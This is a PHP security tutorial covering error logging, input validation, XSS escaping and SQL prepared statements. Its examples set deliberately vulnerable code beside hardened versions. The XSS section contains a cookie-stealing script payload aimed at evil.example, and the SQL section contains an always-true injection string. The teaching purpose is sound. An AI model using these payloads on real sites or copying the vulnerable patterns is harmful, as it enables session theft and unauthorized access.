Tips to Create Secure PHP Applications

by Janeth Kent Date: 29-06-2019 php xss tips sql security injection


PHP is one of the most popular programming languages for the web. The language makes developers productive, but the same conveniences leave security holes that can derail a project. Below are a few tips to help you avoid common PHP security pitfalls and development bugs.

1. Use of Proper Error Reporting

Error reporting can be your best friend during development: error reports help you find misspelled variables and detect incorrect function usage. Once the site goes live, make sure no error output reaches visitors, because error messages leak file paths, query fragments and library versions to an attacker.

The crude way to do this is to call error_reporting(0) at the top of your application file(s), but that also silences your own logs. The better way is to keep error_reporting(E_ALL), turn display_errors off and log_errors on, and point error_log at a file outside the web root.

Always log your errors to a protected file, so that you can diagnose the problem when something goes wrong. With the PHP function set_error_handler you can also route every error through your own handler, which decides what gets logged and what, if anything, the client sees.
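The production setup described above, as an added example that is not part of the original article. The log path /var/log/myapp/php-error.log is an assumption; the final line deliberately triggers a warning so you can see that the handler logs the details and the visitor only gets a generic message.

```php
<?php
declare(strict_types=1);

// Production error configuration: keep reporting on, hide output from the
// client, log to a file outside the web root (path is an assumption).
error_reporting(E_ALL);
ini_set('display_errors', '0');
ini_set('log_errors', '1');
ini_set('error_log', '/var/log/myapp/php-error.log');

// Turn PHP errors into exceptions so nothing is silently skipped.
set_error_handler(function (int $severity, string $message, string $file, int $line): bool {
    if (!(error_reporting() & $severity)) {
        return false; // honour the @ operator and the current error_reporting level
    }
    throw new ErrorException($message, 0, $severity, $file, $line);
});

// Log the full details server-side; send the client a generic 500 only.
set_exception_handler(function (Throwable $e): void {
    error_log(sprintf('[%s] %s in %s:%d', get_class($e), $e->getMessage(), $e->getFile(), $e->getLine()));
    http_response_code(500);
    echo 'An internal error occurred.';
});

// Demonstration: reading an undefined variable raises a warning, which the
// error handler converts into an exception that the exception handler logs.
echo $undefinedVariable;
```

The `return false` branch matters: without it, `@`-suppressed calls and errors below the configured reporting level would still become exceptions and abort otherwise working code.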

2. Disable PHP’s harmful Features

PHP’s creators have always included features intended to make development easier. Some of these conveniences have unintended consequences: we can call them “bad features” because they bypass data validation and open a path for bugs to find their way into scripts. One of the first things you should do when development begins is to disable them. Depending on the host you are using, they may or may not already be turned off for you; if you are developing on your own computer or in another local environment, they probably are not. The worst offenders, register_globals and magic_quotes_gpc, were ubiquitous in PHP 4 applications, deprecated in PHP 5.3 and removed in PHP 5.4 (the “PHP 6” that was expected to drop them never shipped). Settings such as allow_url_include and display_errors still exist and should be checked in every environment.

3. Validate Input

In addition to escaping characters, another good way to protect input is to validate it. Normally you know exactly what kind of data you expect from each input: an integer ID, an e-mail address, one of a fixed set of options. The simplest way to protect yourself against attacks is to make sure users can only submit data of the expected shape, and to reject everything else before it reaches a query or a template.
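Validation of a request against the shapes the application actually expects, as an added example that is not part of the original article. The field names (id, email, sort, username) and the constructed inputs are assumptions for illustration.

```php
<?php
declare(strict_types=1);

/**
 * Validate the parameters of a hypothetical profile request.
 * Returns the cleaned values or throws before anything touches a query.
 */
function validateProfileRequest(array $input): array
{
    // Integer ID in a sane range: rejects "42 OR 1=1", "1e3", arrays and junk.
    $id = filter_var($input['id'] ?? null, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1, 'max_range' => PHP_INT_MAX],
    ]);
    if ($id === false) {
        throw new InvalidArgumentException('id must be a positive integer');
    }

    $email = filter_var($input['email'] ?? '', FILTER_VALIDATE_EMAIL);
    if ($email === false) {
        throw new InvalidArgumentException('email is not a valid address');
    }

    // Allow-list: only the values we enumerate are acceptable, nothing else.
    $allowedSort = ['name', 'created_at'];
    $sort = $input['sort'] ?? 'name';
    if (!in_array($sort, $allowedSort, true)) {
        throw new InvalidArgumentException('sort must be one of ' . implode(', ', $allowedSort));
    }

    // Username: an explicit character set and length, not a deny-list of bad characters.
    $username = $input['username'] ?? '';
    if (!is_string($username) || !preg_match('/\A[A-Za-z0-9_]{3,32}\z/', $username)) {
        throw new InvalidArgumentException('username must be 3-32 letters, digits or underscores');
    }

    return ['id' => $id, 'email' => $email, 'sort' => $sort, 'username' => $username];
}

// Constructed inputs: the first request passes, the second is rejected at
// the id check before it can reach a query or a template.
var_dump(validateProfileRequest([
    'id' => '42', 'email' => 'alice@example.com', 'sort' => 'name', 'username' => 'alice_1',
]));
try {
    validateProfileRequest(['id' => '42 OR 1=1', 'email' => 'alice@example.com', 'username' => 'alice']);
} catch (InvalidArgumentException $e) {
    echo 'Rejected: ', $e->getMessage(), PHP_EOL;
}
```

Validation of this kind is a complement to, not a replacement for, escaping at output time and parameter binding in queries; an address that passes FILTER_VALIDATE_EMAIL can still contain a single quote.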

4. Watch for Cross Site Scripting (XSS) Attacks in User Input

A web application usually accepts input from users and displays it in some way, and that input can arrive in a wide variety of forms. Allowing HTML in input is dangerous because it lets JavaScript execute in unintended ways. If even one hole is left open, the injected JavaScript can read the session cookie, and that cookie can then be replayed to impersonate a real account and give an attacker access to the website’s data. There are several ways to protect your site from such attacks. One is to disallow HTML altogether by encoding every user-supplied value with htmlspecialchars() at the point of output, so that the browser has no way to interpret any of it as markup or script. Marking the session cookie HttpOnly is a worthwhile second layer: it cannot stop an injected script from running, but it keeps document.cookie from revealing the session ID.
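The vulnerable rendering beside its hardened form, as an added example that is not part of the original article. The comment text, the attacker-controlled name and the evil.example host are constructed inputs.

```php
<?php
declare(strict_types=1);

// Escape a value for HTML text and attribute contexts. ENT_QUOTES also
// encodes single quotes (needed inside single-quoted attributes);
// ENT_SUBSTITUTE keeps invalid UTF-8 from collapsing the output to "".
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Constructed attacker input, as it might arrive from a comment form.
$comment = '<script>document.location="https://evil.example/?c="+document.cookie</script>';
$name    = '" onmouseover="alert(1)';

// Vulnerable: raw interpolation. The script tag and the injected event
// handler are interpreted by every reader's browser.
$vulnerable = "<p>{$comment}</p><input value=\"{$name}\">";

// Hardened: the same data, rendered as inert text in both contexts.
$hardened = '<p>' . e($comment) . '</p><input value="' . e($name) . '">';

// Second layer: the session cookie is unreadable from JavaScript (HttpOnly),
// sent only over TLS (Secure) and not attached to cross-site requests (SameSite).
session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Lax']);

echo $vulnerable, PHP_EOL, $hardened, PHP_EOL;
```

Declare the page charset explicitly (Content-Type: text/html; charset=UTF-8) so the encoding htmlspecialchars() assumes matches what the browser uses; a mismatch is one of the classic ways an escape gets bypassed.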

5. Protecting against SQL Injection

SQL injection attacks occur when user data is placed into a query without being checked, and the application does not escape the characters that delimit SQL strings, such as single quotes (‘) or double quotes (“). If these characters get through, a user can change the meaning of the query, for example by making a WHERE clause always true, and trick a login system into authenticating them.

MySQLi helps protect your database input in two ways: either with the mysqli_real_escape_string function on an open connection, or with prepared statements.

Escaping only works for values that end up inside a quoted string literal, and it depends on the connection character set (set it with mysqli_set_charset, not with a SET NAMES query), so it is easy to misuse.

Prepared statements are a method of separating SQL logic from the data passed to it. When you bind variables to a prepared statement, the MySQLi library sends the query text and the values separately, so a value can never be parsed as SQL no matter what characters it contains.
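The vulnerable login lookup beside its prepared-statement version, as an added example that is not part of the original article. It uses PDO with an in-memory SQLite database so it runs without a MySQL server; with MySQLi the hardened function is the same idea, using $mysqli->prepare() followed by bind_param(). The table, the user and the attack string are constructed.

```php
<?php
declare(strict_types=1);

// In-memory SQLite stands in for MySQL so the script runs offline. With
// pdo_mysql you would also set PDO::ATTR_EMULATE_PREPARES => false so that
// parameters are bound by the server rather than interpolated by the driver.
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE users (username TEXT NOT NULL, password_hash TEXT NOT NULL)');
$insert = $db->prepare('INSERT INTO users (username, password_hash) VALUES (?, ?)');
$insert->execute(['alice', password_hash('correct horse', PASSWORD_DEFAULT)]);

// Vulnerable: the username is concatenated into the SQL text. The attack
// string below closes the literal and appends an always-true condition, so
// the first row in the table comes back without any valid credential.
function findUserVulnerable(PDO $db, string $username): ?array
{
    $row = $db->query("SELECT * FROM users WHERE username = '$username'")->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hardened: SQL logic and data travel separately. The same attack string is
// looked up literally as a username and matches nothing.
function findUserSafe(PDO $db, string $username): ?array
{
    $stmt = $db->prepare('SELECT * FROM users WHERE username = :username');
    $stmt->execute([':username' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$attack = "nobody' OR '1'='1";
echo 'vulnerable lookup returned a user: ';
var_dump(findUserVulnerable($db, $attack) !== null);
echo 'prepared lookup returned a user: ';
var_dump(findUserSafe($db, $attack) !== null);

// The password is verified in PHP after the lookup, never compared in SQL.
$user = findUserSafe($db, 'alice');
echo 'alice authenticates with the right password: ';
var_dump($user !== null && password_verify('correct horse', $user['password_hash']));
```

Note that binding only covers values; table and column names or ORDER BY directions cannot be bound and must come from an allow-list as in the validation tip above.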

source: http://www.php-developers.org/blog/
Janeth Kent

Fine Arts graduate and programmer by passion. When I have a spare moment I retouch photos, edit videos and design things. The rest of the time I write for MA-NO WEB DESIGN END DEVELOPMENT.